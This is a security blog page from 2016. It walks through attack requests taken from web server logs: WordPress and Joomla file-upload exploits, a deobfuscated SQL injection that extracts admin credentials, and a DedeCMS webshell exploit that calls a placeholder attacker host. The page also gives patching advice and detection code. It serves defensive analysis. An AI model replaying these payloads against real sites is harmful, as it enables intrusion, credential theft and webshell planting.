Showing posts with label File Upload. Show all posts

Tuesday, August 30, 2016

Work the Flow File Upload Sample Attack

Saw this web request and thought it was interesting enough to mention. It's the Work the Flow File Upload plugin for Wordpress and it appears to be linked to this 2015 File upload exploit.

POST /wp-content/plugins/work-the-flow-file-upload/public/assets/jquery-file-upload-9.5.0/server/php/index.php HTTP/1.1
Host: mysite.com
Content-Length: 270
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=18301442f2ce4a0aba32c60e4bf2f5db
action=upload
files=wp-classes.php


Patch your wordpress plugins or get rid of them if you don't use them!

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Monday, August 29, 2016

Wordpress Gravity Forms File Upload Attempt

Here is a sample from this weekend of last year's Gravity Forms Wordpress file upload exploit.

POST /?gf_page=upload HTTP/1.1
Host: mysite.com
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0
Connection: keep-alive
Content-Length: 2476
Content-Type: multipart/form-data; boundary=3196e7ebf0e84b8499c31b44f2f68dd8
gform_unique_id=../../../../
name=css.php5
form_id=1
field_id=3
file=11.jpg



Thursday, August 18, 2016

SQL Injection Example on Five Star Review

I pasted a few interesting web attacks from very recent logs. Thought it'd be interesting to run through some of them.

GET /plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd) from `#@__admin` limit 0,1),5,6,7,8,9#@`\'` &_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 HTTP/1.1

This first attack looks like it's related to the Five Star Review System, possibly an older, well-known vulnerability in the product of a company that provides websites with review capabilities. If you just add their PHP code to your website, you too can have your customers review your products, provide feedback, rank them with stars, etc. The problem appears to be a SQL injection vulnerability in the _FILES query string parameter. This parameter must not be getting sanitized properly, and thus an attacker is able to execute SQL code against the database behind this website. You'll notice some values (shown in red in the original post) that sort of look like SQL code. Now it looks like in order to get the exploit to work they have to escape characters, thus the reason you see @`\'` together to get the correct syntax down to MySQL.

' or mid=' /*!50000union*//*!50000select*/1,2,3,
(
select CONCAT(0x7c,userid,0x7c,pwd)
from __admin
limit 0,1
)
,5,6,7,8,9'


Next it's interesting to see the /**/ because that looks like comments, right? They can be ignored, right? WRONG! /*!50000 actually has significance in MySQL. The "50000" refers to a MySQL version, and it tells MySQL that only version 5.0.0 and above should run this command, so those versions execute the text inside the comment instead of ignoring it.

' /*!50000union*//*!50000select*/1,2,3,
(
select CONCAT(0x7c,userid,0x7c,pwd)
from __admin
limit 0,1
)
,5,6,7,8,9'


Thus there's actually a union and select statement hidden in there!

' union select 1,2,3,
(
select CONCAT(0x7c,userid,0x7c,pwd)
from __admin
limit 0,1
)
,5,6,7,8,9'


Now you can see from here that the attacker knows the SQL query must return 9 columns, thus the reason his union select is padded with 8 extra integer values. Only the 4th column is of any interest, so that must be the column that the website displays in HTML to the browser, letting the attacker see his results.

select CONCAT(0x7c,userid,0x7c,pwd)
from __admin
limit 0,1


Thus we're down to just that interesting column. You can see it concatenates 0x7c, which per the hex conversion is a pipe (|), with the userid and password. Thus you may see as a result something like '|myusername|mypassword' returned to the screen. Finally, notice that it's querying the __admin table, which must be where the administrator usernames and passwords live for the Five Star Review system, and it's only pulling a few records: the limit clause says 0,1, which means start at record 0 (the 1st one) and pull 1 record. So it's just returning the top record, which is likely the administrator of the Five Star Review system.
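As an added example (not code from the original post), here is a small Python detector that undoes the obfuscation walked through above the way MySQL would see it: it keeps the body of `/*!50000...*/` versioned comments, decodes the 0x7c hex literal, then counts the UNION SELECT columns and pulls out the referenced table. The query string is a constructed copy of the recommend.php request above, and the function and variable names are my own.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Constructed sample modelled on the recommend.php request quoted above (not a real log line).
SAMPLE_QS = ("action=&aid=1&_FILES[type][tmp_name]=\\' or mid=@`\\'` "
             "/*!50000union*//*!50000select*/1,2,3,"
             "(select CONCAT(0x7c,userid,0x7c,pwd) from `#@__admin` limit 0,1),5,6,7,8,9#@`\\'` "
             "&_FILES[type][name]=1.jpg&_FILES[type][size]=4294")

VERSIONED_COMMENT = re.compile(r"/\*!\d{5}\s*(.*?)\s*\*/", re.S)  # /*!50000 ... */ runs on MySQL >= 5.0.0
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)                    # ordinary comments really are ignored
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b", re.I)       # 0x7c is the '|' separator
UNION_SELECT = re.compile(r"\bunion\b\s+(?:all\s+|distinct\s+)?select\s+(.*)", re.S)
FROM_TABLE = re.compile(r"\bfrom\s+`?([^\s`]+)`?")

def normalise_sql(fragment):
    """Rewrite a fragment as MySQL parses it: keep versioned-comment bodies, drop plain comments, decode hex."""
    s = VERSIONED_COMMENT.sub(r" \1 ", fragment)
    s = PLAIN_COMMENT.sub(" ", s)
    s = HEX_LITERAL.sub(lambda m: "'" + bytes.fromhex(m.group(1)).decode("latin-1") + "'", s)
    return re.sub(r"\s+", " ", s).strip().lower()

def split_top_level(select_list):
    """Split a SELECT list on commas outside parentheses; stop at the attacker's trailing '#' comment."""
    items, depth, cur = [], 0, []
    for ch in select_list:
        if depth == 0 and ch == "#":
            break
        depth += (ch == "(") - (ch == ")")          # the subquery nests one level deeper
        if ch == "," and depth == 0:
            items.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    return items + [t] if (t := "".join(cur).strip()) else items

def analyse_param(value):
    """Return None for benign input, else column count, tables and select list of the hidden UNION SELECT."""
    sql = normalise_sql(unquote_plus(value))
    m = UNION_SELECT.search(sql)
    if not m:
        return None
    cols = split_top_level(m.group(1))
    return {"columns": len(cols), "select_list": cols, "tables": FROM_TABLE.findall(sql)}

def scan_query_string(qs):
    """Map each parameter carrying a UNION SELECT to its analysis."""
    return {k: r for k, vs in parse_qs(qs, keep_blank_values=True).items()
            for v in vs if (r := analyse_param(v))}
```

Run against the constructed query string it reports 9 columns, the `#@__admin` table, and the CONCAT expression with the pipe separator already decoded.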

GET /admin/_content/_about/aspcms_aboutedit.asp?id=1 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 from aspcms_user where userid=1 HTTP/1.1

This is a very similar attack to the one described in detail above. I'm guessing this is related to the ASP CMS (content management system), just based on the table they are trying to grab records from (aspcms_user). Notice they are looking for userid=1, which is likely the system administrator record.

Remember, to prevent SQL injection use parameterized queries so that data types cannot change and apostrophes cannot be escaped. Also use a sanitization library that escapes/encodes bad characters. Also make sure to do server-side validation: if a parameter is supposed to take an ID # ... then only allow integers! If it's supposed to be a file type, then make sure it matches a regex, even one as simple as .*\..{1,3}.


Monday, June 6, 2016

vote.api.php File upload request

I saw this http post request

POST / HTTP/1.1
Host: www.mysite.com
Content-Type: multipart/form-data; boundary=----------------5UQqAg13N91D45i2
DNT: 1
Cache-Control: no-cache
Pragma: no-cache
submit=Upload Image
Name=cache.php
F1l3=vote.api.php


Figured it's likely some CMS file upload vulnerability somebody is trying to exploit. Just by googling I wonder if it's related to the Drupal Voting API, but I cannot be certain. Whatever it is, it appears that if you post to the URL and pass in the file you want to upload as a post parameter, the file will get uploaded to the server ... thus an attacker would dump a web shell up there.


Tuesday, May 31, 2016

A File Upload Vulnerability barrage

I noticed a series of Wordpress/Joomla file upload attacks from a single IP address / attacker in a short period of time. Some of the requests are listed below. What I found interesting was not the fact that most were well-known Wordpress vulnerabilities that are still unpatched by many web administrators. What I found interesting was the methodology of the malicious actor. What they have written is likely some sort of script/automated scanning tool, perhaps even a botnet or something that is doing this automatically. I envision that the code/script doing this probably has an array or list of well-known Wordpress file upload vulnerabilities. It's probably a flexible, dynamic list, so that as soon as the attacker hears about a new Wordpress file upload vulnerability, he can literally just add a URL path and a post parameter for the file name, and the script/botnet will start scanning and attacking the internet trying to upload malicious files. Then there is likely a follow-up script that runs shortly after, connects to the uploaded backdoors and validates which ones were successful. In all the cases below the attacker uploads the same malicious file name, upfilees.php, so that the attacker can easily go back later and determine whether this was a device they compromised. The backdoor is probably a web shell that gives them full access to the web server's file system and the ability to run commands on the web server. Below I did my best to research a few of the attacks seen in this cycle and explain a bit.

yiw_contact[]=upfilees.php
yiw_action=sendemail


In the above HTTP Post, there were 2 parameters that started with yiw. This indicates that the attacker is likely trying to exploit the Beauty & Clean Theme File Upload Wordpress Vulnerability, which is literally as simple as posting your backdoor file to the contact field via the sendemail action. If it succeeds, your file has been uploaded to the web server.

POST /uploadify/uploadify.php
Filedata=upfilees.php


In the next HTTP Post, the attacker is likely attempting to exploit the Event Calendar Arbitrary Wordpress File Upload Vulnerability, which is also as simple as passing the file you want uploaded as a post parameter to the uploadify.php page. Again, if successful, the attacker has just uploaded a PHP web page to your server and can now do whatever they please.

POST /tiny_mce/plugins/tinybrowser/upload_file.php?folder=/&type=file&feid=&obfuscate=&sessidpass=
Filedata=upfilees.php.suspected
Filename=send.php.suspected


In the next HTTP Post, the attacker is trying to exploit the tinybrowser Remote File Upload Joomla Vulnerability, which is another simple vulnerability that involves posting the file you want uploaded as a parameter to the upload_file.php page. We're getting a bit repetitive and non-creative in these vulnerabilities, aren't we?

update_file=upfilees.php
action=revslider_ajax_action


In the next HTTP Post, the attacker is trying to exploit the RevSlider Wordpress File Upload Vulnerability, which again requires nothing more than choosing the right action parameter and posting the file, and guess what, the web server will be compromised with a nice PHP backdoor. Oops.

POST /sites/all/libraries/elfinder/php/connector.minimal.php
upload[]=upfilees.php
cmd=upload


In the next HTTP Post, the attacker appears to just be looking for poorly configured systems that have purposely enabled the elFinder File Manager feature, which allows you to remotely manage your web server's file system. Hmmm, can that be exploited? Yep, just post the upload command and your backdoor, and the attacker is in business.

POST /license.php
filename=upfilees.php


The final attack, I believe, may be just a standard filename/location that certain attackers or botnets use to exploit systems. They probably exploited this server at some point and added a backdoor called 'license.php' which allows arbitrary file upload. So this attacker is just taking advantage of another attacker's prior compromise of this device. Easy pickings if it exists.

Wordpress & Joomla plugins should not be trusted (like anything else, for that matter) and should only be added if absolutely needed. If you do need them, then you had better be certain to keep them patched and updated. If you have a plugin that is really not necessary, please, please, please remove those extraneous plugins, as otherwise they're going to open up huge ugly gaping holes in your security posture.
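An added example, not part of the original post: a Python triage pass over constructed request records modelled on the requests in this post and in the Gravity Forms post above. It flags executable filenames and path traversal in form fields, recognises the upload endpoints seen on this page, and then groups hits by source IP to surface the pattern described above, one actor dropping the same file name on many endpoints. The IP addresses, the "/" paths (where the post shows no path) and the function names are my own placeholders.

```python
import re
from collections import Counter, defaultdict

# Constructed request records (src_ip, method, path, form fields) modelled on the requests
# quoted in this post and the Gravity Forms post above; "/" stands in where no path is shown.
REQUESTS = [
    ("198.51.100.7", "POST", "/", {"yiw_contact[]": "upfilees.php", "yiw_action": "sendemail"}),
    ("198.51.100.7", "POST", "/uploadify/uploadify.php", {"Filedata": "upfilees.php"}),
    ("198.51.100.7", "POST", "/tiny_mce/plugins/tinybrowser/upload_file.php",
     {"Filedata": "upfilees.php.suspected", "Filename": "send.php.suspected"}),
    ("198.51.100.7", "POST", "/", {"update_file": "upfilees.php", "action": "revslider_ajax_action"}),
    ("198.51.100.7", "POST", "/sites/all/libraries/elfinder/php/connector.minimal.php",
     {"upload[]": "upfilees.php", "cmd": "upload"}),
    ("198.51.100.7", "POST", "/license.php", {"filename": "upfilees.php"}),
    ("203.0.113.4", "POST", "/?gf_page=upload", {"gform_unique_id": "../../../../", "name": "css.php5"}),
    ("192.0.2.25", "POST", "/wp-admin/admin-ajax.php", {"action": "upload", "files": "holiday.jpg"}),
]

# Names a PHP server may execute; ".php" in the middle (upfilees.php.suspected) or php5 still count.
EXEC_NAME = re.compile(r"\.(?:php\d?|phtml|phar)(?:\.|$)", re.I)
TRAVERSAL = re.compile(r"\.\.[/\\]")
# Upload endpoints seen on this page; a real deployment would keep this list as data.
UPLOAD_ENDPOINTS = ("/uploadify/uploadify.php", "/tinybrowser/upload_file.php",
                    "/elfinder/php/connector.minimal.php", "/license.php", "?gf_page=upload")

def classify(req):
    """Return the reasons a request looks like an upload attack (empty list if none)."""
    _, _, path, fields = req
    reasons = ["known upload endpoint"] if any(path.endswith(e) for e in UPLOAD_ENDPOINTS) else []
    for key, value in fields.items():
        if TRAVERSAL.search(value):
            reasons.append(f"path traversal in {key}")
        if EXEC_NAME.search(value):
            reasons.append(f"executable filename in {key}={value}")
    return reasons

def campaign_summary(requests, min_endpoints=3):
    """Group flagged requests by source IP and report IPs that hit several distinct
    paths, together with the file name they keep trying to drop."""
    by_ip = defaultdict(lambda: {"paths": set(), "names": Counter()})
    for req in requests:
        if not classify(req):
            continue
        src, _, path, fields = req
        by_ip[src]["paths"].add(path)
        by_ip[src]["names"].update(v.lower() for v in fields.values() if EXEC_NAME.search(v))
    return {ip: {"endpoints": len(d["paths"]),
                 "top_filename": (d["names"].most_common(1) or [("", 0)])[0][0]}
            for ip, d in by_ip.items() if len(d["paths"]) >= min_endpoints}
```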


Thursday, December 17, 2015

DedeCMS File Upload vuln real example

Saw this attack below that appears to be targeted at China's popular CMS, DedeCMS.

HEAD /install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php

It appears that if this vulnerable page is available, exposed and not patched, then the attacker can gain remote access, per a blog post I read. The request above is step 1 in the process: it clears the contents of config_update.php, which is likely an important file for the CMS, and once it is empty the guards are down on the site. Then, for the 2nd step, it says the attacker will send a similar request that creates local HTTP services, like the one below.

GET /install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=hello.php&updateHost=http://BADGUYIP:BADGUYPORT/

And your webshell would now live here

GET /install/hello.php

and your site is owned.


